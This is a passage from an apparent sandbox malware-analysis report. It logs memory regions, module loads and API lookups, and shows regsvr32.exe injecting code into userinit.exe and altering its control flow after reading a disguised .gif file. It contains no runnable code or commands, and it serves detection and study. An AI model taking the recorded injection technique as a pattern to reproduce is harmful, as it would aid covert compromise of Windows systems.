pagefile_0x0000000000170000	0x00170000	0x00171fff	Pagefile Backed Memory	r	-
private_0x00000000001a0000	0x001a0000	0x001affff	Private Memory	rw	-
private_0x00000000001f0000	0x001f0000	0x002effff	Private Memory	rw	-
pagefile_0x00000000002f0000	0x002f0000	0x003b7fff	Pagefile Backed Memory	r	-
private_0x00000000003c0000	0x003c0000	0x003cffff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000580000	0x00580000	0x0117ffff	Pagefile Backed Memory	r	-
private_0x0000000001180000	0x01180000	0x0127ffff	Private Memory	-	-
private_0x0000000001280000	0x01280000	0x013affff	Private Memory	rw	-
pagefile_0x0000000001280000	0x01280000	0x0135efff	Pagefile Backed Memory	r	-
private_0x0000000001370000	0x01370000	0x013affff	Private Memory	rw	-
private_0x00000000013b0000	0x013b0000	0x0148ffff	Private Memory	rw	-
private_0x00000000013b0000	0x013b0000	0x0142ffff	Private Memory	rw	-
private_0x0000000001450000	0x01450000	0x0148ffff	Private Memory	rw	-
staticcache.dat	0x01490000	0x01dbffff	Memory Mapped File	r	-
pagefile_0x0000000001dc0000	0x01dc0000	0x021b2fff	Pagefile Backed Memory	r	-
private_0x00000000021c0000	0x021c0000	0x022ccfff	Private Memory	rw	-
private_0x00000000022d0000	0x022d0000	0x023cffff	Private Memory	rw	-
private_0x00000000023d0000	0x023d0000	0x025cffff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x02650fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x02654fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x02658fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x0265cfff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x02662fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x02666fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x0266afff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x0266efff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x02674fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x02678fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x0267cfff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x02682fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x02686fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x0268afff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x0268efff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x02694fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x02698fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x0269cfff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x026a2fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x026a6fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x026aafff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x026aefff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x026b4fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x026b8fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x026bcfff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x026c2fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x026c6fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x026cafff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x026cefff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x026d4fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x026d8fff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x026dcfff	Private Memory	rw	-
private_0x0000000002660000	0x02660000	0x026e2fff	Private Memory	rw	-
private_0x0000000002660000	0x02660000	0x026e6fff	Private Memory	rw	-
private_0x0000000002660000	0x02660000	0x026eafff	Private Memory	rw	-
private_0x0000000002660000	0x02660000	0x026eefff	Private Memory	rw	-
private_0x0000000002670000	0x02670000	0x02704fff	Private Memory	rw	-
private_0x0000000002670000	0x02670000	0x02708fff	Private Memory	rw	-
private_0x0000000002670000	0x02670000	0x0270cfff	Private Memory	rw	-
private_0x0000000002670000	0x02670000	0x02710fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02726fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0272afff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0272efff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02744fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02748fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0274cfff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02750fff	Private Memory	rw	-
private_0x00000000026a0000	0x026a0000	0x02766fff	Private Memory	rw	-
private_0x00000000026a0000	0x026a0000	0x0276afff	Private Memory	rw	-
private_0x00000000026a0000	0x026a0000	0x0276efff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02784fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02788fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0278cfff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02790fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027a6fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027aafff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x027aefff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027c4fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027c8fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027ccfff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027d0fff	Private Memory	rw	-
private_0x00000000026e0000	0x026e0000	0x027e6fff	Private Memory	rw	-
private_0x00000000026e0000	0x026e0000	0x027eafff	Private Memory	rw	-
private_0x00000000026e0000	0x026e0000	0x027effff	Private Memory	-	-
private_0x00000000026f0000	0x026f0000	0x02780fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027c2fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027e0fff	Private Memory	rw	-
private_0x0000000002760000	0x02760000	0x02822fff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x02840fff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x02882fff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x028a0fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028e2fff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x02902fff	Private Memory	rwx	-
private_0x0000000002910000	0x02910000	0x02a0ffff	Private Memory	-	-
private_0x0000000002b40000	0x02b40000	0x02b7ffff	Private Memory	rw	-
private_0x0000000002bb0000	0x02bb0000	0x02caffff	Private Memory	rw	-
sortdefault.nls	0x02cb0000	0x02f7efff	Memory Mapped File	r	-
comctl32.dll	0x6d720000	0x6d7a3fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d800000	0x6d818fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd7000	0x7ffd7000	0x7ffd7fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 20 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffd7008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0x518, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d800000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d720000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = ï , size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d75266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d752542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d751d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d75238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7520c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d751fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d751e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d751f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d751ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d75216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7522be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7521e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8020ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8020b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8020c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8020d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 397295	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #46: userinit.exe

222

0

»

Information	Value
ID	#46
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:02:57, Reason: Child Process
Unmonitor	End Time: 00:03:01, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0x5cc
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 3D8 0x 668 0x 620

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rwx	-
pagefile_0x00000000000e0000	0x000e0000	0x000e6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000f0000	0x000f0000	0x000f1fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00100000	0x00100fff	Memory Mapped File	r	-
private_0x0000000000110000	0x00110000	0x00110fff	Private Memory	rwx	-
pagefile_0x0000000000120000	0x00120000	0x00121fff	Pagefile Backed Memory	r	-
private_0x0000000000130000	0x00130000	0x0013ffff	Private Memory	rw	-
private_0x0000000000140000	0x00140000	0x001bffff	Private Memory	rw	-
windowsshell.manifest	0x001c0000	0x001c0fff	Memory Mapped File	r	-
private_0x00000000001d0000	0x001d0000	0x0020ffff	Private Memory	rw	-
pagefile_0x0000000000210000	0x00210000	0x002d7fff	Pagefile Backed Memory	r	-
pagefile_0x00000000002e0000	0x002e0000	0x003e0fff	Pagefile Backed Memory	r	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
private_0x0000000000470000	0x00470000	0x0051ffff	Private Memory	rw	-
private_0x0000000000530000	0x00530000	0x0053ffff	Private Memory	rw	-
private_0x0000000000540000	0x00540000	0x0063ffff	Private Memory	-	-
private_0x0000000000640000	0x00640000	0x006c0fff	Private Memory	rw	-
private_0x0000000000640000	0x00640000	0x006c4fff	Private Memory	rw	-
private_0x0000000000640000	0x00640000	0x006c8fff	Private Memory	rw	-
private_0x0000000000640000	0x00640000	0x006ccfff	Private Memory	rw	-
private_0x0000000000640000	0x00640000	0x006d0fff	Private Memory	rw	-
private_0x0000000000640000	0x00640000	0x006d4fff	Private Memory	rw	-
private_0x0000000000640000	0x00640000	0x006d8fff	Private Memory	rw	-
private_0x0000000000640000	0x00640000	0x006dcfff	Private Memory	rw	-
private_0x0000000000640000	0x00640000	0x006e0fff	Private Memory	rw	-
private_0x0000000000640000	0x00640000	0x006e4fff	Private Memory	rw	-
private_0x0000000000640000	0x00640000	0x006e8fff	Private Memory	rw	-
private_0x0000000000640000	0x00640000	0x006ecfff	Private Memory	rw	-
userinit.exe	0x006f0000	0x006f8fff	Memory Mapped File	rwx	-
pagefile_0x0000000000700000	0x00700000	0x007defff	Pagefile Backed Memory	r	-
private_0x00000000007e0000	0x007e0000	0x008effff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x00862fff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x00866fff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x0086afff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x0086efff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x00872fff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x00876fff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x0087afff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x0087efff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x00882fff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x00886fff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x0088afff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x0088efff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x00892fff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x00896fff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x0089afff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x0089efff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x008a2fff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x008a6fff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x008aafff	Private Memory	rw	-
private_0x00000000007e0000	0x007e0000	0x008aefff	Private Memory	rw	-
private_0x00000000008b0000	0x008b0000	0x008effff	Private Memory	rw	-
private_0x00000000008f0000	0x008f0000	0x009effff	Private Memory	rw	-
pagefile_0x00000000009f0000	0x009f0000	0x015effff	Pagefile Backed Memory	r	-
staticcache.dat	0x015f0000	0x01f1ffff	Memory Mapped File	r	-
pagefile_0x0000000001f20000	0x01f20000	0x02312fff	Pagefile Backed Memory	r	-
private_0x0000000002320000	0x02320000	0x0242cfff	Private Memory	rw	-
private_0x0000000002430000	0x02430000	0x0252ffff	Private Memory	rw	-
private_0x0000000002530000	0x02530000	0x0272ffff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027e0fff	Private Memory	rw	-
